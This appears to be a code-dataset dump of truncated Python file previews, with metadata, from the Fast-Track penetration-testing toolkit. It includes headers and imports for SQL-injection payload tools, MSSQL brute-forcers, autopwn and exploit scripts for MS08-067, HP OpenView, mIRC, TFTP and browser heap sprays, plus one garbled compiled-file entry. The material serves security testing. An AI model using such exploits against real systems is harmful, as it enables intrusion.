definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
# define metasploit path
meta_path=file("%s/config/fasttrack_config" % (definepath),"r").readlines()
for line in meta_path:
line=line.rstrip()
match=re.s... | 5,810 | Python | .py | 130 | 40.1 | 189 | 0.650707 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,349 | sqlbinarypayload.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/sqlbinarypayload.py | #!/usr/bin/env python
import socket
import pexpect
import time
import sys
import os
import re
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
include.print_banner()
try:
ipaddr=socket.socket(socket.AF_INET, sock... | 16,160 | Python | .py | 169 | 92.639053 | 1,531 | 0.679294 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,350 | updateft.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/updateft.py | #!/usr/bin/env python
import time
import os
import sys
import subprocess
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
include.print_banner()
try:
import psyco
psyco.full()
except ImportError:
pass
print "\n Updating Fast-Track, please wait...."
time.sleep(3)
... | 1,662 | Python | .py | 35 | 42.514286 | 210 | 0.679035 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,351 | autopwn.pyc | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/autopwn.pyc | —Ú
öÉkOc @ s≥ d d k Z d d k Z d d k Z d d k Z d d k Z e i É Z e i i d e É d d k Z y d d k
Z
e
i É Wn e j
o n Xy e i
d Z Wn) e j
o e i É e d É Z n Xe d j p
e d j o d GHe i É n y e i
d Z Wn e j
o ... | 3,177 | Python | .py | 51 | 58.568627 | 352 | 0.573496 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,352 | sqlbinarypayloadpost.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/.svn/text-base/sqlbinarypayloadpost.py.svn-base | #!/usr/bin/env python
from urllib2 import urlopen
from ClientForm import ParseResponse
import os
import sys
import re
import socket
import time
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
include.print_banner()
try:
import psyco
psyco.full()
except ImportError:
pass
... | 11,739 | Python | .py | 99 | 114.20202 | 8,130 | 0.6865 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,353 | sqlping.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/.svn/text-base/sqlping.py.svn-base | #!/usr/bin/env python
import time
import subprocess
import os
import re
import sys
definepath=os.getcwd()
# define metasploit path
meta_path=file("%s/config/fasttrack_config" % (definepath),"r").readlines()
for line in meta_path:
line=line.rstrip()
match=re.search("METASPLOIT_PATH",line)
if match:
... | 4,190 | Python | .py | 95 | 39.136842 | 202 | 0.682007 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,354 | binarypayloadgen.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/.svn/text-base/binarypayloadgen.py.svn-base | #!/usr/bin/env python
import os
import sys
import time
import subprocess
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
include.print_banner()
try:
import psyco
psyco.full()
except ImportError:
pass
try:
define=sys.argv[3]
except IndexError:
print """Binary to Hex... | 2,085 | Python | .py | 56 | 33.946429 | 91 | 0.685672 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,355 | updatemeta.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/.svn/text-base/updatemeta.py.svn-base | #!/usr/bin/env python
import os
import re
try:
import psyco
psyco.full()
except ImportError:
pass
definepath=os.getcwd()
# define metasploit path
meta_path=file("%s/config/fasttrack_config" % (definepath),"r").readlines()
for line in meta_path:
line=line.rstrip()
match=re.search("METASPLOIT_PATH",li... | 495 | Python | .py | 19 | 23 | 75 | 0.711864 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,356 | sqlftppayload.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/.svn/text-base/sqlftppayload.py.svn-base | #!/usr/bin/env python
import pexpect
import os
import time
import sys
import subprocess
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
try:
targeturl=sys.argv[4]
except IndexError:
include.print_banner()
... | 4,058 | Python | .py | 78 | 48.24359 | 854 | 0.706757 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,357 | sqlbrutequick.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/.svn/text-base/sqlbrutequick.py.svn-base | #!/usr/bin/env python
import _mssql
import sys
import os
import time
import re
import subprocess
import pexpect
import socket
definepath=os.getcwd()
try:
import psyco
psyco.full()
except ImportError:
pass
try:
username=sys.argv[5]
except IndexError:
username=raw_input("Enter username for SQL database... | 21,517 | Python | .py | 389 | 44.115681 | 668 | 0.612174 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,358 | updates.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/.svn/text-base/updates.py.svn-base | #!/usr/bin/env python
import time
import os
import sys
import subprocess
import re
try:
import psyco
psyco.full()
except ImportError:
pass
definepath=os.getcwd()
print "\nNote this DOES NOT install prereqs, please go to the installation menu for that.\nUpdating Fast-Track, Metasploit, Aircrack-NG, Nikto, W3A... | 3,771 | Python | .py | 71 | 48.873239 | 210 | 0.72582 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,359 | sqlbinarypayload.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/.svn/text-base/sqlbinarypayload.py.svn-base | #!/usr/bin/env python
import socket
import pexpect
import time
import sys
import os
import re
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
include.print_banner()
try:
ipaddr=socket.socket(socket.AF_INET, sock... | 16,160 | Python | .py | 169 | 92.639053 | 1,531 | 0.679294 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,360 | payloadgen.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/.svn/text-base/payloadgen.py.svn-base | #!/usr/bin/env python
# Import modules
import subprocess,time,sys,os,re
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
# define metasploit path
meta_path=file("%s/config/fasttrack_config" % (definepath),"r").readlines()
for line in meta_path:
line=line.rstrip()
match=re.s... | 5,810 | Python | .py | 130 | 40.1 | 189 | 0.650707 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,361 | include.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/.svn/text-base/include.py.svn-base | #!/usr/bin/env python
import os
import re
import time
# Compile a regex for faster searching
re_distrofile = re.compile ('BackTrack.+')
def get_version():
readversion=file("bin/version/version","r")
for line in readversion:
version=line.rstrip()
return version
#
# Class for colors
#
class bcolor... | 2,162 | Python | .py | 53 | 36.962264 | 145 | 0.387804 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,362 | autopwn.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/.svn/text-base/autopwn.py.svn-base | #!/usr/bin/env python
import pexpect
import sys
import os
import time
import re
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
try:
ipaddr=sys.argv[3]
except IndexError:
include.print_banner()
ipaddr=raw_... | 2,963 | Python | .py | 85 | 31.070588 | 133 | 0.700454 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,363 | sqlbruteword.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/.svn/text-base/sqlbruteword.py.svn-base | #!/usr/bin/env python
import _mssql
import sys
import os
import time
import re
import subprocess
import pexpect
import socket
definepath=os.getcwd()
try:
import psyco
psyco.full()
except ImportError:
pass
try:
# scanfirst1=sys.argv[4]
username=sys.argv[5]
except IndexError:
# scanfirst1=raw_input("... | 25,904 | Python | .py | 469 | 43.292111 | 305 | 0.607555 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,364 | updateft.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/.svn/text-base/updateft.py.svn-base | #!/usr/bin/env python
import time
import os
import sys
import subprocess
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
include.print_banner()
try:
import psyco
psyco.full()
except ImportError:
pass
print "\n Updating Fast-Track, please wait...."
time.sleep(3)
... | 1,662 | Python | .py | 35 | 42.514286 | 210 | 0.679035 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,365 | sqlmanual.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/.svn/text-base/sqlmanual.py.svn-base | #!/usr/bin/env python
import socket
import pexpect
import os
import time
import sys
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
try:
targeturl=sys.argv[4]
port=sys.argv[6]
ipaddr=sys.argv[5]
except Ind... | 15,236 | Python | .py | 143 | 103.895105 | 1,531 | 0.684416 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,366 | about.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/obsolete/about.py | #!/usr/bin/env python
fileopen=file("readme/README").readlines()
print "\n"
for line in fileopen:
print line.rstrip()
pause=raw_input("\nPress enter to return to main menu")
| 180 | Python | .py | 6 | 28 | 55 | 0.744186 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,367 | obsolete_changelog.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/obsolete/obsolete_changelog.py | #!/usr/bin/env python
import os
import sys
from bin.include import print_banner
definepath=os.getcwd()
openfile=file("%s/readme/CHANGELOG" % (definepath),"r").readlines()
print_banner()
print '\n'
for line in openfile:
print line.rstrip()
pause=raw_input("\bHit enter to return to main menu.")
| 302 | Python | .py | 11 | 25.727273 | 67 | 0.759582 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,368 | obsolete_credits.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/obsolete/obsolete_credits.py | #!/usr/bin/env python
import os
import sys
import bin.include
openfile=file("readme/CREDITS","r").readlines()
print '\n'
for line in openfile:
print line.rstrip()
pause=raw_input("\b Hit enter to return to main menu.")
| 231 | Python | .py | 9 | 23.666667 | 58 | 0.741935 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,369 | obsolete_about.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/obsolete/obsolete_about.py | #!/usr/bin/env python
fileopen=file("readme/README").readlines()
print "\n"
for line in fileopen:
print line.rstrip()
pause=raw_input("\nPress enter to return to main menu")
| 182 | Python | .py | 6 | 28 | 55 | 0.744186 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,370 | obsolete_about.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/obsolete/.svn/text-base/obsolete_about.py.svn-base | #!/usr/bin/env python
fileopen=file("readme/README").readlines()
print "\n"
for line in fileopen:
print line.rstrip()
pause=raw_input("\nPress enter to return to main menu")
| 182 | Python | .py | 6 | 28 | 55 | 0.744186 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,371 | obsolete_credits.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/obsolete/.svn/text-base/obsolete_credits.py.svn-base | #!/usr/bin/env python
import os
import sys
import bin.include
openfile=file("readme/CREDITS","r").readlines()
print '\n'
for line in openfile:
print line.rstrip()
pause=raw_input("\b Hit enter to return to main menu.")
| 231 | Python | .py | 9 | 23.666667 | 58 | 0.741935 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,372 | obsolete_changelog.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/obsolete/.svn/text-base/obsolete_changelog.py.svn-base | #!/usr/bin/env python
import os
import sys
from bin.include import print_banner
definepath=os.getcwd()
openfile=file("%s/readme/CHANGELOG" % (definepath),"r").readlines()
print_banner()
print '\n'
for line in openfile:
print line.rstrip()
pause=raw_input("\bHit enter to return to main menu.")
| 302 | Python | .py | 11 | 25.727273 | 67 | 0.759582 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,373 | about.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/obsolete/.svn/text-base/about.py.svn-base | #!/usr/bin/env python
fileopen=file("readme/README").readlines()
print "\n"
for line in fileopen:
print line.rstrip()
pause=raw_input("\nPress enter to return to main menu")
| 180 | Python | .py | 6 | 28 | 55 | 0.744186 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,374 | httpserver.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/clientattack/httpserver.py | #!/usr/bin/env python
# Import modules needed here..all standard Python modules
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys
import os
import binascii
try:
import psyco
psyco.full()
except ImportError:
pass
try:
ipaddr = sys.argv[1]
except IndexEr... | 4,339 | Python | .py | 83 | 41.301205 | 268 | 0.595143 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,375 | massclient.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/clientattack/massclient.py | #!/usr/bin/env python
import pexpect
import sys
import os
import subprocess
import re
#from bin.include import print_banner
try:
import psyco
psyco.full()
except ImportError:
pass
basepath = os.getcwd()
#def show_massclient(basepath):
# define metasploit path
meta_path=file("%s/bin/config/config" % (ba... | 8,761 | Python | .py | 178 | 39.393258 | 210 | 0.612223 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,376 | massclient.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/clientattack/.svn/text-base/massclient.py.svn-base | #!/usr/bin/env python
import pexpect
import sys
import os
import subprocess
import re
#from bin.include import print_banner
try:
import psyco
psyco.full()
except ImportError:
pass
basepath = os.getcwd()
#def show_massclient(basepath):
# define metasploit path
meta_path=file("%s/bin/config/config" % (ba... | 8,761 | Python | .py | 178 | 39.393258 | 210 | 0.612223 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,377 | httpserver.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/clientattack/.svn/text-base/httpserver.py.svn-base | #!/usr/bin/env python
# Import modules needed here..all standard Python modules
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys
import os
import binascii
try:
import psyco
psyco.full()
except ImportError:
pass
try:
ipaddr = sys.argv[1]
except IndexEr... | 4,339 | Python | .py | 83 | 41.301205 | 268 | 0.595143 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,378 | sqlpwnage.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/sqlpwnage/sqlpwnage.py | #!/usr/bin/env python
###########################################################################
# Created by: Andrew Weidenhamer and David Kennedy #
# #
# Email: aweidenhamer@SecureState.com ... | 58,080 | Python | .py | 924 | 38.03355 | 364 | 0.385417 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,379 | sqlpwnage.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/sqlpwnage/.svn/text-base/sqlpwnage.py.svn-base | #!/usr/bin/env python
###########################################################################
# Created by: Andrew Weidenhamer and David Kennedy #
# #
# Email: aweidenhamer@SecureState.com ... | 58,080 | Python | .py | 924 | 38.03355 | 364 | 0.385417 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,380 | spider.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/sqlpwnage/app/spider/spider.py | #!/usr/bin/env python
"""Web Crawler/Spider
This module implements a web crawler. This is very _basic_ only
and needs to be extended to do anything usefull with the
traversed pages.
"""
import unicodedata
import re
import sys
import time
import urllib2
import urlparse
import optparse
import collections
from Beautif... | 7,398 | Python | .py | 189 | 26.724868 | 360 | 0.512632 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,381 | spider.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/sqlpwnage/app/spider/.svn/text-base/spider.py.svn-base | #!/usr/bin/env python
"""Web Crawler/Spider
This module implements a web crawler. This is very _basic_ only
and needs to be extended to do anything usefull with the
traversed pages.
"""
import unicodedata
import re
import sys
import time
import urllib2
import urlparse
import optparse
import collections
from Beautif... | 7,398 | Python | .py | 189 | 26.724868 | 360 | 0.512632 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,382 | depend.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/.svn/text-base/depend.py.svn-base | #!/usr/bin/env python
import os
count=0
# Perform Dependency check
print "\n\n\n\n\n***********************************************\n******* Performing dependency checks... *******\n***********************************************\n"
try:
import _mssql
print "*** FreeTDS and PYMMSQL are installed. (Check) ***... | 6,335 | Python | .py | 121 | 45.504132 | 304 | 0.67215 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,383 | nsecommon.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/.svn/text-base/nsecommon.py.svn-base | #!/usr/bin/env python
'''Created on Sep 18, 2010
@author: Joey Furr (j0fer)'''
import os
from bin.include import print_banner
from time import sleep
# For NSE integration
def runnse(command):
print_banner()
os.system(command)
raw_input("\nPress <enter> to return...\n")
def get_target(counter,self_banner... | 1,209 | Python | .py | 36 | 26.777778 | 72 | 0.615785 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,384 | include.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/.svn/text-base/include.py.svn-base | #!/usr/bin/env python
import os
def get_version():
readversion=file("bin/version/version","r")
for line in readversion:
version=line.rstrip()
return version
def print_banner():
# os.system("clear")
print ''' *****************************************************************
** ... | 845 | Python | .py | 18 | 43.888889 | 79 | 0.309002 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,385 | nmapsmbcheckvulns.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/.svn/text-base/nmapsmbcheckvulns.py.svn-base | #!/usr/bin/env python
from bin.include import print_banner
from bin.nsecommon import get_target,runnse
def nmapsmbcheckvulns_run():
""" Main execution logic: reuse common
nse modules for this nse script """
self_banner = """ ** Nmap Scripting Engine: Script - smb-check-vulns **
** ... | 1,640 | Python | .py | 33 | 44.090909 | 97 | 0.556898 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,386 | mirc.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/exploits/mirc.py | #!/usr/bin/env python
from socket import *
import subprocess
import os
import sys
import time
#from bin.include import print_banner
#print_banner()
print """
mIRC 6.34 Remote Buffer Overflow Exploit
Original Exploit by SkD (skdrat <at> hotmail <.> com)
Rewritten by: ReL1K for Fast-Track (perl to python c... | 3,144 | Python | .py | 67 | 45.19403 | 118 | 0.719596 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,387 | hpopenviewnnm.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/exploits/hpopenviewnnm.py | #!/usr/bin/env python
import socket
import os
import sys
from time import sleep
from bin.include import print_banner
# Alphanumeric egghunter shellcode + restricted chars \x40\x3f\x3a\x2f - ph33r
# One egg to rule them all.
print_banner()
try:
target=sys.argv[4]
except IndexError:
print "HP OpenView NNM Expl... | 5,080 | Python | .py | 96 | 51.260417 | 116 | 0.716126 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,388 | ms08067.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/exploits/ms08067.py | #!/usr/bin/env python
#############################################################################
# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
# www.hackingspirits.com
# www.coffeeandsecurity.com
# Email: d3basis.m0hanty @ gmail.com
#################################################################... | 7,612 | Python | .py | 157 | 43.77707 | 141 | 0.641416 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,389 | goodtech1.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/exploits/goodtech1.py | #!/usr/bin/env python
#
# Goodtech SSH Remote Buffer Overflow Universal Exploit
# Written by: ReL1K
# Original exploit discovery by: r0ut3r
#
#
# Tested on GoodTech 6.4 Windows 2003 SP0 and SP1
#
# rel1k@box:~/$ python goodtech.py
# Enter the IP or hostname of victim: 10.211.55.5
# Enter the username for server: admi... | 5,326 | Python | .py | 136 | 37.411765 | 164 | 0.717677 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,390 | firefox35.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/exploits/firefox35.py | #!/usr/bin/env python
######################################################
#
# FireFox 3.5 Heap Spray (WIN, OSX, LINUX)
# LINUX = Cause Crash
# Smart Detection on Browser + OS
# Originally discovered by: Simon Berry-Bryne
# Pythonized by: David Kennedy (ReL1K) @ SecureState
#
#########################################... | 5,934 | Python | .py | 178 | 29.601124 | 163 | 0.659452 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,391 | hpopenview.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/exploits/hpopenview.py | #!/usr/bin/env python
import os
import sys
#from bin.include import print_banner
#print_banner()
choice=raw_input(""" Enter which version you want to target:
All JMP ESP's are performed in User32.dll
1. Windows 2000 Service Pack 0 - JMP ESP 77D20738
2. Windows 2000 Service Pack 4 - JMP ESP 77e3c256
... | 5,419 | Python | .py | 96 | 48.697917 | 134 | 0.636191 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,392 | ibmcad.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/exploits/ibmcad.py | #!/usr/bin/env python
import sys
import os
import socket
import time
#from bin.include import print_banner
#print_banner()
try:
import psyco
psyco.full()
except ImportError:
pass
choice=raw_input(""" Enter which version you want to target:
All JMP ESP's are performed in User32.dll
1. Windo... | 5,371 | Python | .py | 102 | 47.882353 | 132 | 0.676841 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,393 | tftp.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/exploits/tftp.py | #!/usr/bin/env python
# TFTP Server for Windows V1.4 ST (0day)
# http://sourceforge.net/projects/tftp-server/
# Tested on Windows Vista SP0.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/sourceforge-tftpd.py.txt
######################################################... | 3,617 | Python | .py | 84 | 41.571429 | 84 | 0.664016 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,394 | goodtech.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/exploits/goodtech.py | #!/usr/bin/env python
#
import subprocess
import os
import time
try:
import paramiko #@UnresolvedImport @UnusedImport
import sys
except IndexError:
print "Paramiko SSH Module not installed, download from:\n http://www.lag.net/paramiko/download/paramiko-1.7.4.tar.gz\nor in debian package is python-paramik... | 519 | Python | .py | 15 | 31.666667 | 163 | 0.755511 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,395 | ms08067run.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/exploits/ms08067run.py | #!/usr/bin/env python
#
# had to add this due to paramariko dying when importing the function
#
#
import os
import sys
import subprocess
try:
from impacket import smb
from impacket import uuid
from impacket.dcerpc import dcerpc
from impacket.dcerpc import transport
except ImportError, _:
print ' ... | 703 | Python | .py | 21 | 30.761905 | 94 | 0.737537 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,396 | xmlcorruptionbo.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/exploits/xmlcorruptionbo.py | #!/usr/bin/env python
# Import modules needed here..all standard Python modules
#
# XML Parsing Buffer Overflow Heap Spray
#
# Most of the code was taken from Krafty's allinone exploit
# Greetz to Muts, HDM
#
# Rewritten by: David Kennedy aka ReL1K
# Tested on Windows 2k3 SP2
# win32_bind EXITFUNC=seh LPORT=5500 Size=... | 4,319 | Python | .py | 87 | 46.528736 | 1,061 | 0.725249 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,397 | ms09002.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/exploits/ms09002.py | #!/usr/bin/env python
###############################################################################
# MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) #
###############################################################################
# #
# Thanks to str0ke for fi... | 5,296 | Python | .py | 104 | 45.942308 | 1,053 | 0.594668 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,398 | ie0day_activex.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/exploits/ie0day_activex.py | #!/usr/bin/env python
######################################################################################
# MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890) #
######################################################################################
# ... | 8,542 | Python | .py | 141 | 54.361702 | 1,069 | 0.529116 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
